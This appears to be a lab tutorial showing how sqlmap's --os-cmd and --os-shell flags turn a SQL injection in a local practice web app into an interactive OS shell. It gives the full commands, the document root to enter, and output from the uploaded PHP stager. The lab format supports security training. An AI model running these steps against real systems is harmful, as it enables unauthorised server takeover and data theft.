Introduction
In this lab, you will learn how to use sqlmap, a popular open-source penetration testing tool, to escalate a SQL injection vulnerability into a full, interactive operating system shell. While sqlmap is excellent for enumerating and exfiltrating data from databases, its capabilities extend to gaining control over the underlying server.
We will focus on the --os-shell feature, which attempts to upload a web shell (a stager) to the target server, providing you with a command prompt to interact directly with the remote system. For this lab, a simple web application vulnerable to SQL injection has been set up and is running on your local machine.
Confirm OS Command Execution is Possible
In this step, before attempting to get a full interactive shell, we will first verify that we can execute commands on the target operating system. This is a crucial preliminary check. We can achieve this using the --os-cmd flag in sqlmap, which instructs the tool to execute a single specified command.
We will use the whoami command, which prints the effective username of the current user. We will also use the --batch flag to let sqlmap run with its default answers to all interactive questions, making the process faster.
Execute the following command in your terminal:
sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --os-cmd="whoami" --batch
You will see a lot of output as sqlmap tests the target. Wait for it to complete. Towards the end of the output, you should see the result of the whoami command.
...
[22:10:30] [INFO] fetching command output
[22:10:30] [INFO] retrieved: 'labex\n'
...
command execution stdout:
labex
...
The output labex confirms that we can successfully execute commands on the remote server as the user labex.
Use the --os-shell Flag to Request an Interactive Shell
In this step, we will prepare the command to gain a full interactive shell. Now that we've confirmed OS command execution is possible, we can proceed with more confidence.
The sqlmap flag for this is --os-shell. When this flag is used, sqlmap will attempt to upload a "stager," which is a small piece of code (in this case, a PHP web shell), to a writable directory on the web server. This stager then provides the mechanism for an interactive command shell.
The command we will use is:
sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --os-shell
When you run this command in the next step, sqlmap will guide you through a few prompts to determine the best way to upload the stager. We will not run the command in this step, but simply understand its purpose.
Execute the Command to Spawn the Shell
In this step, you will execute the command to spawn the interactive shell. sqlmap will ask for your input to determine the web application's language and the server's document root (the main folder for the website).
First, run the command in your terminal:
sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --os-shell
sqlmap will start and may ask you a few questions.
It might ask about the back-end DBMS. You can press Enter to accept the default that it has likely already detected (e.g., SQLite).
It will then ask for the web server document root. This is a critical step. sqlmap needs to know a writable directory to upload its web shell. Based on our setup script, the correct path is
/home/labex/project/vulnerable_app.[?] what is the web server document root? [/var/www/html] >Type the following path and press Enter:
/home/labex/project/vulnerable_app
After you provide the path, sqlmap will attempt to upload the stager. If successful, you will see messages indicating the upload and will be dropped into a new prompt: os-shell>.
...
[22:15:45] [INFO] trying to upload stager shell to '/home/labex/project/vulnerable_app'
[22:15:45] [INFO] uploading stager shell to '/home/labex/project/vulnerable_app/tmpueyge.php'
[22:15:45] [INFO] stager shell uploaded
os-shell>
This os-shell> prompt is your interactive shell on the remote server.
Interact with the Remote System via the sqlmap Shell Prompt
In this step, you will interact with the remote system using the os-shell> prompt you've just gained. This prompt is not your local terminal; every command you type here is sent to the remote server and executed.
Let's run a couple of simple commands to verify our access.
First, find out the present working directory on the remote server by typing pwd and pressing Enter.
os-shell > pwd
The output should be the directory where sqlmap uploaded its stager file.
/home/labex/project/vulnerable_app
Next, confirm your user identity on the remote system again by typing whoami.
os-shell > whoami
The output should once again be labex.
labex
You have now successfully executed commands interactively on the target system.
Execute Multiple Commands and Explore the Filesystem
In this step, you will perform further exploration of the remote filesystem. An interactive shell is powerful because it allows you to navigate directories, view files, and understand the server's layout.
First, list the contents of the current directory (/home/labex/project/vulnerable_app) in long format using the ls -l command.
os-shell > ls -l
You will see the files in this directory, including index.php, users.db, and the temporary PHP web shell uploaded by sqlmap (e.g., tmpueyge.php).
total 20
-rw-r--r-- 1 labex labex 539 Dec 10 22:05 index.php
-rw-r--r-- 1 labex labex 45 Dec 10 22:15 tmpueyge.php
-rw-r--r-- 1 labex labex 12288 Dec 10 22:05 users.db
Now, let's try to navigate the filesystem. Move up to the parent directory (/home/labex/project) using the cd .. command.
os-shell > cd ..
You won't see any output, but your current directory on the remote server has changed. Verify this by listing the contents of the new directory.
os-shell > ls
You should see the vulnerable_app directory listed.
vulnerable_app
You are now free to explore the filesystem within the permissions of the labex user. To exit the sqlmap shell and return to your normal terminal, simply type exit and press Enter.
Summary
In this lab, you successfully escalated a SQL injection vulnerability to gain full command-line access to a remote server. You have learned how to:
- Use sqlmap's
--os-cmdflag to confirm that OS command execution is possible. - Employ the
--os-shellflag to instruct sqlmap to establish an interactive shell. - Provide necessary information, like the web server's document root, to facilitate the upload of a web shell.
- Interact with the remote system by executing commands like
pwd,whoami,ls, andcdthrough the sqlmap shell.
This exercise demonstrates the critical security risk posed by SQL injection vulnerabilities, as they can lead not just to data theft but to a complete system compromise.
